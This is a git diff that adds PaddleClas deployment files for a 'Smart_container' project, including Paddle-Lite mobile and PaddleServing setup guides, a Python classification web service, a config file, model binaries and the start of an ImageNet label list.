model to mobile phones. Please refer to the [link](https://paddle-lite.readthedocs.io/zh/latest/user_guides/Compile/Android.html#id2) for more detailed information about compiling. + + +The structure of the inference library is as follows: + +``` +inference_lite_lib.android.armv8/ +|-- cxx C++ inference library and header files +| |-- include C++ header files +| | |-- paddle_api.h +| | |-- paddle_image_preprocess.h +| | |-- paddle_lite_factory_helper.h +| | |-- paddle_place.h +| | |-- paddle_use_kernels.h +| | |-- paddle_use_ops.h +| | `-- paddle_use_passes.h +| `-- lib C++ inference library +| |-- libpaddle_api_light_bundled.a C++ static library +| `-- libpaddle_light_api_shared.so C++ dynamic library +|-- java Java inference library +| |-- jar +| | `-- PaddlePredictor.jar +| |-- so +| | `-- libpaddle_lite_jni.so +| `-- src +|-- demo C++ and java demos +| |-- cxx C++ demos +| `-- java Java demos +``` + + + +## 4. Inference Model Optimization + +Paddle-Lite provides a variety of strategies to automatically optimize the original training model, including quantization, sub-graph fusion, hybrid scheduling, Kernel optimization and so on. In order to make the optimization process more convenient and easy to use, Paddle-Lite provides `opt` tool to automatically complete the optimization steps and output a lightweight, optimal executable model. + +**NOTE**: If you have already got the `.nb` file, you can skip this step. + + + +### 4.1 [RECOMMEND] Use `pip` to install Paddle-Lite and optimize model + +* Use pip to install Paddle-Lite. The following command uses `pip3.7` . + +```shell +pip install paddlelite==2.8 +``` +**Note**:The version of `paddlelite`'s wheel must match that of inference lib. + +* Use `paddle_lite_opt` to optimize inference model, the parameters of `paddle_lite_opt` are as follows: + +| Parameters | Explanation | +| ----------------------- | ------------------------------------------------------------ | +| --model_dir | Path to the PaddlePaddle model (no-combined) file to be optimized. | +| --model_file | Path to the net structure file of PaddlePaddle model (combined) to be optimized. | +| --param_file | Path to the net weight files of PaddlePaddle model (combined) to be optimized. | +| --optimize_out_type | Type of output model, `protobuf` by default. Supports `protobuf` and `naive_buffer` . Compared with `protobuf`, you can use`naive_buffer` to get a more lightweight serialization/deserialization model. If you need to predict on the mobile-side, please set it to `naive_buffer`. | +| --optimize_out | Path to output model, not needed to add `.nb` suffix. | +| --valid_targets | The executable backend of the model, `arm` by default. Supports one or some of `x86` , `arm` , `opencl` , `npu` , `xpu`. If set more than one, please separate the options by space, and the `opt` tool will choose the best way automatically. If need to support Huawei NPU (DaVinci core carried by Kirin 810/990 SoC), please set it to `npu arm` . | +| --record_tailoring_info | Whether to enable `Cut the Library Files According To the Model` , `false` by default. If need to record kernel and OP infos of optimized model, please set it to `true`. | + +In addition, you can run `paddle_lite_opt` to get more detailed information about how to use. + +### 4.2 Compile Paddle-Lite to generate `opt` tool + +Optimizing model requires Paddle-Lite's `opt` executable file, which can be obtained by compiling the Paddle-Lite. The steps are as follows: + +```shell +# get the Paddle-Lite source code, if have gotten , please skip +git clone https://github.com/PaddlePaddle/Paddle-Lite.git +cd Paddle-Lite +git checkout develop +# compile +./lite/tools/build.sh build_optimize_tool +``` + +After the compilation is complete, the `opt` file is located under `build.opt/lite/api/`. + +`opt` tool is used in the same way as `paddle_lite_opt` , please refer to [4.1](#4.1). + + + +### 4.3 Demo of get the optimized model + +Taking the `MobileNetV3_large_x1_0` model of PaddleClas as an example, we will introduce how to use `paddle_lite_opt` to complete the conversion from the pre-trained model to the inference model, and then to the Paddle-Lite optimized model. + +```shell +# enter PaddleClas root directory +cd PaddleClas_root_path + +# download and uncompress the inference model +wget https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/inference/MobileNetV3_large_x1_0_infer.tar +tar -xf MobileNetV3_large_x1_0_infer.tar + + +# convert inference model to Paddle-Lite optimized model +paddle_lite_opt --model_file=./MobileNetV3_large_x1_0_infer/inference.pdmodel --param_file=./MobileNetV3_large_x1_0_infer/inference.pdiparams --optimize_out=./MobileNetV3_large_x1_0 +``` + +When the above code command is completed, there will be ``MobileNetV3_large_x1_0.nb` in the current directory, which is the converted model file. + +## 5. Run optimized model on Phone + +1. Prepare an Android phone with `arm8`. If the compiled inference library and `opt` file are `armv7`, you need an `arm7` phone and modify `ARM_ABI = arm7` in the Makefile. + +2. Install the ADB tool on the computer. + + * Install ADB for MAC + + Recommend use homebrew to install. + + ```shell + brew cask install android-platform-tools + ``` + * Install ADB for Linux + + ```shell + sudo apt update + sudo apt install -y wget adb + ``` + * Install ADB for windows + If install ADB fo Windows, you need to download from Google's Android platform: [Download Link](https://developer.android.com/studio). + + First, make sure the phone is connected to the computer, turn on the `USB debugging` option of the phone, and select the `file transfer` mode. Verify whether ADB is installed successfully as follows: + + ```shell + $ adb devices + + List of devices attached + 744be294 device + ``` + + If there is `device` output like the above, it means the installation was successful. + +4. Prepare optimized model, inference library files, test image and dictionary file used. + +```shell +cd PaddleClas_root_path +cd deploy/lite/ + +# prepare.sh will put the inference library files, the test image and the dictionary files in demo/cxx/clas +sh prepare.sh /{lite inference library path}/inference_lite_lib.android.armv8 + +# enter the working directory of lite demo +cd /{lite inference library path}/inference_lite_lib.android.armv8/ +cd demo/cxx/clas/ + +# copy the C++ inference dynamic library file (ie. .so) to the debug folder +cp ../../../cxx/lib/libpaddle_light_api_shared.so ./debug/ +``` + +The `prepare.sh` take `PaddleClas/deploy/lite/imgs/tabby_cat.jpg` as the test image, and copy it to the `demo/cxx/clas/debug/` directory. + +You should put the model that optimized by `paddle_lite_opt` under the `demo/cxx/clas/debug/` directory. In this example, use `MobileNetV3_large_x1_0.nb` model file generated in [2.1.3](#4.3). + +The structure of the clas demo is as follows after the above command is completed: + +``` +demo/cxx/clas/ +|-- debug/ +| |--MobileNetV3_large_x1_0.nb class model +| |--tabby_cat.jpg test image +| |--imagenet1k_label_list.txt dictionary file +| |--libpaddle_light_api_shared.so C++ .so file +| |--config.txt config file +|-- config.txt config file +|-- image_classfication.cpp source code +|-- Makefile compile file +``` + +**NOTE**: + +* `Imagenet1k_label_list.txt` is the category mapping file of the `ImageNet1k` dataset. If use a custom category, you need to replace the category mapping file. +* `config.txt` contains the hyperparameters, as follows: + +```shell +clas_model_file ./MobileNetV3_large_x1_0.nb # path of model file +label_path ./imagenet1k_label_list.txt # path of category mapping file +resize_short_size 256 # the short side length after resize +crop_size 224 # side length used for inference after cropping + +visualize 0 # whether to visualize. If you set it to 1, an image file named 'clas_result.png' will be generated in the current directory. +``` + +5. Run Model on Phone + +```shell +# run compile to get the executable file 'clas_system' +make -j + +# move the compiled executable file to the debug folder +mv clas_system ./debug/ + +# push the debug folder to Phone +adb push debug /data/local/tmp/ + +adb shell +cd /data/local/tmp/debug +export LD_LIBRARY_PATH=/data/local/tmp/debug:$LD_LIBRARY_PATH + +# the usage of clas_system is as follows: +# ./clas_system "path of config file" "path of test image" +./clas_system ./config.txt ./tabby_cat.jpg +``` + +**NOTE**: If you make changes to the code, you need to recompile and repush the `debug ` folder to the phone. + +The result is as follows: + +
+ +
+ + + +## FAQ + +Q1:If I want to change the model, do I need to go through the all process again? +A1:If you have completed the above steps, you only need to replace the `.nb` model file after replacing the model. At the same time, you may need to modify the path of `.nb` file in the config file and change the category mapping file to be compatible the model . + +Q2:How to change the test picture? +A2:Replace the test image under debug folder with the image you want to test,and then repush to the Phone again. diff --git a/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/.tar b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/.tar new file mode 100644 index 0000000..ffc2b9f Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/.tar differ diff --git a/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdiparams b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdiparams new file mode 100644 index 0000000..014e7c2 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdiparams differ diff --git a/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdiparams.info b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdiparams.info new file mode 100644 index 0000000..4b645bf Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdiparams.info differ diff --git a/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdmodel b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdmodel new file mode 100644 index 0000000..a444c2d Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdmodel differ diff --git a/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer.zip b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer.zip new file mode 100644 index 0000000..bf9e9b8 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer.zip differ diff --git a/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/infer_cfg.yml b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/infer_cfg.yml new file mode 100644 index 0000000..42f78c0 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/infer_cfg.yml @@ -0,0 +1,28 @@ +mode: fluid +draw_threshold: 0.5 +metric: COCO +use_dynamic_shape: false +arch: PicoDet +min_subgraph_size: 3 +Preprocess: +- interp: 2 + keep_ratio: false + target_size: + - 416 + - 416 + type: Resize +- is_scale: true + mean: + - 0.485 + - 0.456 + - 0.406 + std: + - 0.229 + - 0.224 + - 0.225 + type: NormalizeImage +- type: Permute +- stride: 32 + type: PadStride +label_list: +- foreground diff --git a/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdiparams b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdiparams new file mode 100644 index 0000000..9d74bb0 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdiparams differ diff --git a/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdiparams.info b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdiparams.info new file mode 100644 index 0000000..401c11d Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdiparams.info differ diff --git a/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdmodel b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdmodel new file mode 100644 index 0000000..544cbcd Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdmodel differ diff --git a/Smart_container/PaddleClas/deploy/paddleserving/README.md b/Smart_container/PaddleClas/deploy/paddleserving/README.md new file mode 100644 index 0000000..bb34b12 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/README.md @@ -0,0 +1,172 @@ +# PaddleClas Pipeline WebService + +(English|[简体中文](./README_CN.md)) + +PaddleClas provides two service deployment methods: +- Based on **PaddleHub Serving**: Code path is "`./deploy/hubserving`". Please refer to the [tutorial](../../deploy/hubserving/readme_en.md) +- Based on **PaddleServing**: Code path is "`./deploy/paddleserving`". if you prefer retrieval_based image reocognition service, please refer to [tutorial](./recognition/README.md),if you'd like image classification service, Please follow this tutorial. + +# Image Classification Service deployment based on PaddleServing + +This document will introduce how to use the [PaddleServing](https://github.com/PaddlePaddle/Serving/blob/develop/README.md) to deploy the ResNet50_vd model as a pipeline online service. + +Some Key Features of Paddle Serving: +- Integrate with Paddle training pipeline seamlessly, most paddle models can be deployed with one line command. +- Industrial serving features supported, such as models management, online loading, online A/B testing etc. +- Highly concurrent and efficient communication between clients and servers supported. + +The introduction and tutorial of Paddle Serving service deployment framework reference [document](https://github.com/PaddlePaddle/Serving/blob/develop/README.md). + + +## Contents +- [Environmental preparation](#environmental-preparation) +- [Model conversion](#model-conversion) +- [Paddle Serving pipeline deployment](#paddle-serving-pipeline-deployment) +- [FAQ](#faq) + + +## Environmental preparation + +PaddleClas operating environment and PaddleServing operating environment are needed. + +1. Please prepare PaddleClas operating environment reference [link](../../docs/zh_CN/tutorials/install.md). + Download the corresponding paddle whl package according to the environment, it is recommended to install version 2.1.0. + +2. The steps of PaddleServing operating environment prepare are as follows: + + Install serving which used to start the service + ``` + pip3 install paddle-serving-server==0.6.1 # for CPU + pip3 install paddle-serving-server-gpu==0.6.1 # for GPU + # Other GPU environments need to confirm the environment and then choose to execute the following commands + pip3 install paddle-serving-server-gpu==0.6.1.post101 # GPU with CUDA10.1 + TensorRT6 + pip3 install paddle-serving-server-gpu==0.6.1.post11 # GPU with CUDA11 + TensorRT7 + ``` + +3. Install the client to send requests to the service + In [download link](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md) find the client installation package corresponding to the python version. + The python3.7 version is recommended here: + + ``` + wget https://paddle-serving.bj.bcebos.com/test-dev/whl/paddle_serving_client-0.0.0-cp37-none-any.whl + pip3 install paddle_serving_client-0.0.0-cp37-none-any.whl + ``` + +4. Install serving-app + ``` + pip3 install paddle-serving-app==0.6.1 + ``` + + **note:** If you want to install the latest version of PaddleServing, refer to [link](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md). + + + +## Model conversion +When using PaddleServing for service deployment, you need to convert the saved inference model into a serving model that is easy to deploy. + +Firstly, download the inference model of ResNet50_vd +``` +# Download and unzip the ResNet50_vd model +wget https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/inference/ResNet50_vd_infer.tar && tar xf ResNet50_vd_infer.tar +``` + +Then, you can use installed paddle_serving_client tool to convert inference model to mobile model. +``` +# ResNet50_vd model conversion +python3 -m paddle_serving_client.convert --dirname ./ResNet50_vd_infer/ \ + --model_filename inference.pdmodel \ + --params_filename inference.pdiparams \ + --serving_server ./ResNet50_vd_serving/ \ + --serving_client ./ResNet50_vd_client/ +``` + +After the ResNet50_vd inference model is converted, there will be additional folders of `ResNet50_vd_serving` and `ResNet50_vd_client` in the current folder, with the following format: +``` +|- ResNet50_vd_client/ + |- __model__ + |- __params__ + |- serving_server_conf.prototxt + |- serving_server_conf.stream.prototxt + +|- ResNet50_vd_client + |- serving_client_conf.prototxt + |- serving_client_conf.stream.prototxt +``` + +Once you have the model file for deployment, you need to change the alias name in `serving_server_conf.prototxt`: Change `alias_name` in `feed_var` to `image`, change `alias_name` in `fetch_var` to `prediction`, +The modified serving_server_conf.prototxt file is as follows: +``` +feed_var { + name: "inputs" + alias_name: "image" + is_lod_tensor: false + feed_type: 1 + shape: 3 + shape: 224 + shape: 224 +} +fetch_var { + name: "save_infer_model/scale_0.tmp_1" + alias_name: "prediction" + is_lod_tensor: true + fetch_type: 1 + shape: -1 +} +``` + + +## Paddle Serving pipeline deployment + +1. Download the PaddleClas code, if you have already downloaded it, you can skip this step. + ``` + git clone https://github.com/PaddlePaddle/PaddleClas + + # Enter the working directory + cd PaddleClas/deploy/paddleserving/ + ``` + + The paddleserving directory contains the code to start the pipeline service and send prediction requests, including: + ``` + __init__.py + config.yml # configuration file of starting the service + pipeline_http_client.py # script to send pipeline prediction request by http + pipeline_rpc_client.py # script to send pipeline prediction request by rpc + classification_web_service.py # start the script of the pipeline server + ``` + +2. Run the following command to start the service. + ``` + # Start the service and save the running log in log.txt + python3 classification_web_service.py &>log.txt & + ``` + After the service is successfully started, a log similar to the following will be printed in log.txt + ![](./imgs/start_server.png) + +3. Send service request + ``` + python3 pipeline_http_client.py + ``` + After successfully running, the predicted result of the model will be printed in the cmd window. An example of the result is: + ![](./imgs/results.png) + + Adjust the number of concurrency in config.yml to get the largest QPS. + + ``` + op: + concurrency: 8 + ... + ``` + + Multiple service requests can be sent at the same time if necessary. + + The predicted performance data will be automatically written into the `PipelineServingLogs/pipeline.tracer` file. + + +## FAQ +**Q1**: No result return after sending the request. + +**A1**: Do not set the proxy when starting the service and sending the request. You can close the proxy before starting the service and before sending the request. The command to close the proxy is: +``` +unset https_proxy +unset http_proxy +``` diff --git a/Smart_container/PaddleClas/deploy/paddleserving/README_CN.md b/Smart_container/PaddleClas/deploy/paddleserving/README_CN.md new file mode 100644 index 0000000..b0222d2 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/README_CN.md @@ -0,0 +1,170 @@ +# PaddleClas 服务化部署 + +([English](./README.md)|简体中文) + +PaddleClas提供2种服务部署方式: +- 基于PaddleHub Serving的部署:代码路径为"`./deploy/hubserving`",使用方法参考[文档](../../deploy/hubserving/readme.md); +- 基于PaddleServing的部署:代码路径为"`./deploy/paddleserving`", 基于检索方式的图像识别服务参考[文档](./recognition/README_CN.md), 图像分类服务按照本教程使用。 + +# 基于PaddleServing的图像分类服务部署 + +本文档以经典的ResNet50_vd模型为例,介绍如何使用[PaddleServing](https://github.com/PaddlePaddle/Serving/blob/develop/README_CN.md)工具部署PaddleClas +动态图模型的pipeline在线服务。 + +相比较于hubserving部署,PaddleServing具备以下优点: +- 支持客户端和服务端之间高并发和高效通信 +- 支持 工业级的服务能力 例如模型管理,在线加载,在线A/B测试等 +- 支持 多种编程语言 开发客户端,例如C++, Python和Java + +更多有关PaddleServing服务化部署框架介绍和使用教程参考[文档](https://github.com/PaddlePaddle/Serving/blob/develop/README_CN.md)。 + +## 目录 +- [PaddleClas 服务化部署](#paddleclas-服务化部署) +- [基于PaddleServing的图像分类服务部署](#基于paddleserving的图像分类服务部署) + - [目录](#目录) + - [环境准备](#环境准备) + - [模型转换](#模型转换) + - [Paddle Serving pipeline部署](#paddle-serving-pipeline部署) + - [FAQ](#faq) + + +## 环境准备 + +需要准备PaddleClas的运行环境和PaddleServing的运行环境。 + +- 准备PaddleClas的[运行环境](../../docs/zh_CN/tutorials/install.md), 根据环境下载对应的paddle whl包,推荐安装2.1.0版本 + +- 准备PaddleServing的运行环境,步骤如下 + +1. 安装serving,用于启动服务 + ``` + pip3 install paddle-serving-server==0.6.1 # for CPU + pip3 install paddle-serving-server-gpu==0.6.1 # for GPU + # 其他GPU环境需要确认环境再选择执行如下命令 + pip3 install paddle-serving-server-gpu==0.6.1.post101 # GPU with CUDA10.1 + TensorRT6 + pip3 install paddle-serving-server-gpu==0.6.1.post11 # GPU with CUDA11 + TensorRT7 + ``` + +2. 安装client,用于向服务发送请求 + 在[下载链接](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md)中找到对应python版本的client安装包,这里推荐python3.7版本: + + ``` + wget https://paddle-serving.bj.bcebos.com/test-dev/whl/paddle_serving_client-0.0.0-cp37-none-any.whl + pip3 install paddle_serving_client-0.0.0-cp37-none-any.whl + ``` + +3. 安装serving-app + ``` + pip3 install paddle-serving-app==0.6.1 + ``` + **Note:** 如果要安装最新版本的PaddleServing参考[链接](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md)。 + + +## 模型转换 + +使用PaddleServing做服务化部署时,需要将保存的inference模型转换为serving易于部署的模型。 + +首先,下载ResNet50_vd的inference模型 +``` +# 下载并解压ResNet50_vd模型 +wget https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/inference/ResNet50_vd_infer.tar && tar xf ResNet50_vd_infer.tar +``` + +接下来,用安装的paddle_serving_client把下载的inference模型转换成易于server部署的模型格式。 + +``` +# 转换ResNet50_vd模型 +python3 -m paddle_serving_client.convert --dirname ./ResNet50_vd_infer/ \ + --model_filename inference.pdmodel \ + --params_filename inference.pdiparams \ + --serving_server ./ResNet50_vd_serving/ \ + --serving_client ./ResNet50_vd_client/ +``` +ResNet50_vd推理模型转换完成后,会在当前文件夹多出`ResNet50_vd_serving` 和`ResNet50_vd_client`的文件夹,具备如下格式: +``` +|- ResNet50_vd_client/ + |- __model__ + |- __params__ + |- serving_server_conf.prototxt + |- serving_server_conf.stream.prototxt + +|- ResNet50_vd_client + |- serving_client_conf.prototxt + |- serving_client_conf.stream.prototxt + +``` +得到模型文件之后,需要修改serving_server_conf.prototxt中的alias名字: 将`feed_var`中的`alias_name`改为`image`, 将`fetch_var`中的`alias_name`改为`prediction`, +修改后的serving_server_conf.prototxt内容如下: +``` +feed_var { + name: "inputs" + alias_name: "image" + is_lod_tensor: false + feed_type: 1 + shape: 3 + shape: 224 + shape: 224 +} +fetch_var { + name: "save_infer_model/scale_0.tmp_1" + alias_name: "prediction" + is_lod_tensor: true + fetch_type: 1 + shape: -1 +} +``` + + +## Paddle Serving pipeline部署 + +1. 下载PaddleClas代码,若已下载可跳过此步骤 + ``` + git clone https://github.com/PaddlePaddle/PaddleClas + + # 进入到工作目录 + cd PaddleClas/deploy/paddleserving/ + ``` + paddleserving目录包含启动pipeline服务和发送预测请求的代码,包括: + ``` + __init__.py + config.yml # 启动服务的配置文件 + pipeline_http_client.py # http方式发送pipeline预测请求的脚本 + pipeline_rpc_client.py # rpc方式发送pipeline预测请求的脚本 + classification_web_service.py # 启动pipeline服务端的脚本 + ``` + +2. 启动服务可运行如下命令: + ``` + # 启动服务,运行日志保存在log.txt + python3 classification_web_service.py &>log.txt & + ``` + 成功启动服务后,log.txt中会打印类似如下日志 + ![](./imgs/start_server.png) + +3. 发送服务请求: + ``` + python3 pipeline_http_client.py + ``` + 成功运行后,模型预测的结果会打印在cmd窗口中,结果示例为: + ![](./imgs/results.png) + + 调整 config.yml 中的并发个数可以获得最大的QPS + ``` + op: + #并发数,is_thread_op=True时,为线程并发;否则为进程并发 + concurrency: 8 + ... + ``` + 有需要的话可以同时发送多个服务请求 + + 预测性能数据会被自动写入 `PipelineServingLogs/pipeline.tracer` 文件中。 + + +## FAQ +**Q1**: 发送请求后没有结果返回或者提示输出解码报错 + +**A1**: 启动服务和发送请求时不要设置代理,可以在启动服务前和发送请求前关闭代理,关闭代理的命令是: +``` +unset https_proxy +unset http_proxy +``` diff --git a/Smart_container/PaddleClas/deploy/paddleserving/__init__.py b/Smart_container/PaddleClas/deploy/paddleserving/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Smart_container/PaddleClas/deploy/paddleserving/classification_web_service.py b/Smart_container/PaddleClas/deploy/paddleserving/classification_web_service.py new file mode 100644 index 0000000..6c353eb --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/classification_web_service.py @@ -0,0 +1,73 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import sys +from paddle_serving_app.reader import Sequential, URL2Image, Resize, CenterCrop, RGB2BGR, Transpose, Div, Normalize, Base64ToImage +try: + from paddle_serving_server_gpu.web_service import WebService, Op +except ImportError: + from paddle_serving_server.web_service import WebService, Op +import logging +import numpy as np +import base64, cv2 + +class ImagenetOp(Op): + def init_op(self): + self.seq = Sequential([ + Resize(256), CenterCrop(224), RGB2BGR(), Transpose((2, 0, 1)), + Div(255), Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225], + True) + ]) + self.label_dict = {} + label_idx = 0 + with open("imagenet.label") as fin: + for line in fin: + self.label_dict[label_idx] = line.strip() + label_idx += 1 + + def preprocess(self, input_dicts, data_id, log_id): + (_, input_dict), = input_dicts.items() + batch_size = len(input_dict.keys()) + imgs = [] + for key in input_dict.keys(): + data = base64.b64decode(input_dict[key].encode('utf8')) + data = np.fromstring(data, np.uint8) + im = cv2.imdecode(data, cv2.IMREAD_COLOR) + img = self.seq(im) + imgs.append(img[np.newaxis, :].copy()) + input_imgs = np.concatenate(imgs, axis=0) + return {"image": input_imgs}, False, None, "" + + def postprocess(self, input_dicts, fetch_dict, log_id): + score_list = fetch_dict["prediction"] + result = {"label": [], "prob": []} + for score in score_list: + score = score.tolist() + max_score = max(score) + result["label"].append(self.label_dict[score.index(max_score)] + .strip().replace(",", "")) + result["prob"].append(max_score) + result["label"] = str(result["label"]) + result["prob"] = str(result["prob"]) + return result, None, "" + + +class ImageService(WebService): + def get_pipeline_response(self, read_op): + image_op = ImagenetOp(name="imagenet", input_ops=[read_op]) + return image_op + + +uci_service = ImageService(name="imagenet") +uci_service.prepare_pipeline_config("config.yml") +uci_service.run_service() diff --git a/Smart_container/PaddleClas/deploy/paddleserving/config.yml b/Smart_container/PaddleClas/deploy/paddleserving/config.yml new file mode 100644 index 0000000..d9f464d --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/config.yml @@ -0,0 +1,33 @@ +#worker_num, 最大并发数。当build_dag_each_worker=True时, 框架会创建worker_num个进程,每个进程内构建grpcSever和DAG +##当build_dag_each_worker=False时,框架会设置主线程grpc线程池的max_workers=worker_num +worker_num: 1 + +#http端口, rpc_port和http_port不允许同时为空。当rpc_port可用且http_port为空时,不自动生成http_port +http_port: 18080 +rpc_port: 9993 + +dag: + #op资源类型, True, 为线程模型;False,为进程模型 + is_thread_op: False +op: + imagenet: + #并发数,is_thread_op=True时,为线程并发;否则为进程并发 + concurrency: 1 + + #当op配置没有server_endpoints时,从local_service_conf读取本地服务配置 + local_service_conf: + + #uci模型路径 + model_config: ResNet50_vd_serving + + #计算硬件类型: 空缺时由devices决定(CPU/GPU),0=cpu, 1=gpu, 2=tensorRT, 3=arm cpu, 4=kunlun xpu + device_type: 1 + + #计算硬件ID,当devices为""或不写时为CPU预测;当devices为"0", "0,1,2"时为GPU预测,表示使用的GPU卡 + devices: "0" # "0,1" + + #client类型,包括brpc, grpc和local_predictor.local_predictor不启动Serving服务,进程内预测 + client_type: local_predictor + + #Fetch结果列表,以client_config中fetch_var的alias_name为准 + fetch_list: ["prediction"] diff --git a/Smart_container/PaddleClas/deploy/paddleserving/cpu_utilization.py b/Smart_container/PaddleClas/deploy/paddleserving/cpu_utilization.py new file mode 100644 index 0000000..984c723 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/cpu_utilization.py @@ -0,0 +1,4 @@ +import psutil +cpu_utilization=psutil.cpu_percent(1,False) +print('CPU_UTILIZATION:', cpu_utilization) + diff --git a/Smart_container/PaddleClas/deploy/paddleserving/daisy.jpg b/Smart_container/PaddleClas/deploy/paddleserving/daisy.jpg new file mode 100644 index 0000000..7edeca6 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/paddleserving/daisy.jpg differ diff --git a/Smart_container/PaddleClas/deploy/paddleserving/imagenet.label b/Smart_container/PaddleClas/deploy/paddleserving/imagenet.label new file mode 100644 index 0000000..d714673 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/imagenet.label @@ -0,0 +1,1000 @@ +tench, Tinca tinca, +goldfish, Carassius auratus, +great white shark, white shark, man-eater, man-eating shark, Carcharodon carcharias, +tiger shark, Galeocerdo cuvieri, +hammerhead, hammerhead shark, +electric ray, crampfish, numbfish, torpedo, +stingray, +cock, +hen, +ostrich, Struthio camelus, +brambling, Fringilla montifringilla, +goldfinch, Carduelis carduelis, +house finch, linnet, Carpodacus mexicanus, +junco, snowbird, +indigo bunting, indigo finch, indigo bird, Passerina cyanea, +robin, American robin, Turdus migratorius, +bulbul, +jay, +magpie, +chickadee, +water ouzel, dipper, +kite, +bald eagle, American eagle, Haliaeetus leucocephalus, +vulture, +great grey owl, great gray owl, Strix nebulosa, +European fire salamander, Salamandra salamandra, +common newt, Triturus vulgaris, +eft, +spotted salamander, Ambystoma maculatum, +axolotl, mud puppy, Ambystoma mexicanum, +bullfrog, Rana catesbeiana, +tree frog, tree-frog, +tailed frog, bell toad, ribbed toad, tailed toad, Ascaphus trui, +loggerhead, loggerhead turtle, Caretta caretta, +leatherback turtle, leatherback, leathery turtle, Dermochelys coriacea, +mud turtle, +terrapin, +box turtle, box tortoise, +banded gecko, +common iguana, iguana, Iguana iguana, +American chameleon, anole, Anolis carolinensis, +whiptail, whiptail lizard, +agama, +frilled lizard, Chlamydosaurus kingi, +alligator lizard, +Gila monster, Heloderma suspectum, +green lizard, Lacerta viridis, +African chameleon, Chamaeleo chamaeleon, +Komodo dragon, Komodo lizard, dragon lizard, giant lizard, Varanus komodoensis, +African crocodile, Nile crocodile, Crocodylus niloticus, +American alligator, Alligator mississipiensis, +triceratops, +thunder snake, worm snake, Carphophis amoenus, +ringneck snake, ring-necked snake, ring snake, +hognose snake, puff adder, sand viper, +green snake, grass snake, +king snake, kingsnake, +garter snake, grass snake, +water snake, +vine snake, +night snake, Hypsiglena torquata, +boa constrictor, Constrictor constrictor, +rock python, rock snake, Python sebae, +Indian cobra, Naja naja, +green mamba, +sea snake, +horned viper, cerastes, sand viper, horned asp, Cerastes cornutus, +diamondback, diamondback rattlesnake, Crotalus adamanteus, +sidewinder, horned rattlesnake, Crotalus cerastes, +trilobite, +harvestman, daddy longlegs, Phalangium opilio, +scorpion, +black and gold garden spider, Argiope aurantia, +barn spider, Araneus cavaticus, +garden spider, Aranea diademata, +black widow, Latrodectus mactans, +tarantula, +wolf spider, hunting spider, +tick, +centipede, +black grouse, 